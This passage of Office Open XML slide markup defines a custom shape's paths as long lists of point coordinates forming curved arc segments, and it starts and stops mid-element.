                <a:spcPts val="190"/>
              </a:spcBef>
            </a:pP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stribution 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4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use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25173" y="3773601"/>
            <a:ext cx="2896870" cy="2943225"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2896870" h="2943225">
                <a:moveTo>
                  <a:pt x="274002" y="703783"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="237934" y="667334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211493" y="709307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186613" y="751992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163283" y="795337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141516" y="839304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121297" y="883856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102628" y="928928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85534" y="974509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69977" y="1020533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55981" y="1066965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43535" y="1113751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32651" y="1160868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23329" y="1208265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15544" y="1255903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9334" y="1303731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4660" y="1351699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1549" y="1399781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1447927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1496098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1549" y="1544243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4660" y="1592326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9334" y="1640293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15544" y="1688122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23329" y="1735759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32651" y="1783156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43535" y="1830273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55981" y="1877060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69977" y="1923491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85534" y="1969516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102628" y="2015096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121297" y="2060168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141516" y="2104720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163283" y="2148687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186613" y="2192032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211493" y="2234717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237934" y="2276678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274002" y="2240229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248666" y="2198674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="224866" y="2156460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202603" y="2113623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181889" y="2070201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162699" y="2026246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145034" y="1981809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128917" y="1936902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114338" y="1891588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101282" y="1845906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89776" y="1799894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79794" y="1753590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71348" y="1707032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64439" y="1660283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59067" y="1613357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55232" y="1566316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52920" y="1519186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52158" y="1472006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52920" y="1424838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55232" y="1377708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59067" y="1330667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64439" y="1283741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71348" y="1236992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79794" y="1190434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89776" y="1144130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101282" y="1098118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114338" y="1052436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128917" y="1007122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145034" y="962215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162699" y="917778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181889" y="873823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202603" y="830402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="224866" y="787565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248666" y="745350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274002" y="703783"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896870" h="2943225">
                <a:moveTo>
                  <a:pt x="1194498" y="2673299"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1146797" y="2661780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1099870" y="2648407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053731" y="2633192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1008443" y="2616212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="964018" y="2597480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="920521" y="2577058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="877989" y="2554973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="836447" y="2531262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="795947" y="2505976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="756526" y="2479154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718210" y="2450833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="681062" y="2421051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="645121" y="2389860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="610412" y="2357285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576973" y="2323388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="544855" y="2288184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514096" y="2251722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="484733" y="2214054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="456806" y="2175205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="430364" y="2135225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="405422" y="2094153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="382054" y="2052027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360273" y="2008898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340131" y="1964791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="321665" y="1919744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304914" y="1873821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289915" y="1827034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="276720" y="1779447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265366" y="1731086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222186" y="1731086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="232803" y="1778812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245160" y="1825815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259194" y="1872056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274878" y="1917509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="292176" y="1962137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311048" y="2005914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="331470" y="2048776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="353402" y="2090724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="376809" y="2131695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="401650" y="2171674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="427913" y="2210600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455536" y="2248471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="484492" y="2285225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514756" y="2320836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546277" y="2355265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="579043" y="2388489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="612990" y="2420455"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="648106" y="2451138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="684352" y="2480513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="721690" y="2508516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760082" y="2535136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="799503" y="2560332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="839901" y="2584069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="881253" y="2606306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="923531" y="2627020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="966685" y="2646159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1010691" y="2663698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1055509" y="2679598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101102" y="2693822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1147445" y="2706344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1194498" y="2717114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1194498" y="2673299"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896870" h="2943225">
                <a:moveTo>
                  <a:pt x="1194498" y="226898"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1147445" y="237718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101102" y="250278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1055509" y="264566"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1010691" y="280517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="966685" y="298107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="923531" y="317309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="881253" y="338086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="839901" y="360400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="799503" y="384200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760082" y="409473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="721690" y="436181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="684352" y="464273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="648106" y="493737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="612990" y="524522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="579043" y="556590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546277" y="589902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514756" y="624446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="484492" y="660158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455536" y="697026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="427913" y="735012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="401650" y="774065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="376809" y="814158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="353402" y="855256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="331470" y="897318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311048" y="940320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="292176" y="984224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274878" y="1028992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259194" y="1074585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245160" y="1120965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="232803" y="1168120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222186" y="1215974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265366" y="1215974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="276720" y="1167472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289915" y="1119720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304914" y="1072794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="321665" y="1026718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340131" y="981544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360273" y="937298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="382054" y="894029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="405422" y="851776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="430364" y="810577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="456806" y="770470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="484733" y="731507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514096" y="693724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="544855" y="657161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576973" y="621855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="610412" y="587844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="645121" y="555167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="681062" y="523887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718210" y="494017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="756526" y="465607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="795947" y="438708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="836447" y="413346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="877989" y="389559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="920521" y="367411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="964018" y="346925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1008443" y="328129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053731" y="311099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1099870" y="295833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1146797" y="282409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1194498" y="270840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1194498" y="226898"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896870" h="2943225">
                <a:moveTo>
                  <a:pt x="2243010" y="2701874"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2207069" y="2665298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2164842" y="2691727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2121928" y="2716492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2078367" y="2739618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2034209" y="2761081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989505" y="2780893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1944281" y="2799067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1898586" y="2815577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1852472" y="2830436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1805990" y="2843644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1759165" y="2855214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1712048" y="2865120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1664703" y="2873375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1617141" y="2879979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1569427" y="2884932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1521612" y="2888234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1473720" y="2889885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1425803" y="2889885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1377911" y="2888234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1330096" y="2884932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282382" y="2879979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1234821" y="2873375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1187475" y="2865120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1140358" y="2855214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1093533" y="2843644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1047051" y="2830436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1000937" y="2815577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="955243" y="2799067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="910018" y="2780893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="865314" y="2761081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="821156" y="2739618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="777595" y="2716492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="734682" y="2691727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="692467" y="2665298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="656526" y="2701874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="697890" y="2728658"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="739952" y="2753855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="782688" y="2777477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="826020" y="2799537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="869937" y="2820009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914374" y="2838907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="959294" y="2856230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1004671" y="2871978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1050442" y="2886151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1096568" y="2898762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1143025" y="2909786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1189748" y="2919234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1236700" y="2927108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1283855" y="2933408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1331150" y="2938132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1378546" y="2941282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1426019" y="2942856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1473504" y="2942856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1520977" y="2941282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1568373" y="2938132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1615668" y="2933408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1662823" y="2927108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1709775" y="2919234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1756498" y="2909786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1802955" y="2898762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1849081" y="2886151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1894852" y="2871978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1940229" y="2856230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1985149" y="2838907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2029587" y="2820009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2073503" y="2799537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2116836" y="2777477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2159571" y="2753855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2201634" y="2728658"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2243010" y="2701874"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896870" h="2943225">
                <a:moveTo>
                  <a:pt x="2243010" y="242011"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2201634" y="215125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2159571" y="189814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2116836" y="166090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2073503" y="143941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2029587" y="123380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1985149" y="104394"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1940229" y="86995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1894852" y="71183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1849081" y="56946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1802955" y="44284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1756498" y="33210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1709775" y="23723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1662823" y="15811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1615668" y="9486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1568373" y="4737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1520977" y="1574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1473504" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1426019" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1378546" y="1574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1331150" y="4737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1283855" y="9486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1236700" y="15811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1189748" y="23723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1143025" y="33210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1096568" y="44284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1050442" y="56946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1004671" y="71183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="959294" y="86995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914374" y="104394"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="869937" y="123380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="826020" y="143941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="782688" y="166090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="739952" y="189814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="697890" y="215125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="656526" y="242011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="692467" y="278714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="734682" y="252183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="777595" y="227317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="821156" y="204089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="865314" y="182537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="910018" y="162636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="955243" y="144399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1000937" y="127812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1047051" y="112890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1093533" y="99618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1140358" y="88011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1187475" y="78054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1234821" y="69773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282382" y="63131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1330096" y="58166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1377911" y="54838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1425803" y="53187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1473720" y="53187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1521612" y="54838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1569427" y="58166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1617141" y="63131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1664703" y="69773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1712048" y="78054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1759165" y="88011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1805990" y="99618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1852472" y="112890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1898586" y="127812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1944281" y="144399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989505" y="162636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2034209" y="182537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2078367" y="204089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2121928" y="227317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2164842" y="252183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2207069" y="278714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2243010" y="242011"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896870" h="2943225">
                <a:moveTo>
                  <a:pt x="2674302" y="1731086"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2631122" y="1731086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2619756" y="1779447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2606560" y="1827034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2591562" y="1873821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2574810" y="1919744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2556345" y="1964791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2536202" y="2008898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2514422" y="2052027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2491054" y="2094153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2466111" y="2135225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2439670" y="2175205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2411742" y="2214054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2382380" y="2251722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2351621" y="2288184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2319502" y="2323388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2286063" y="2357285"/>
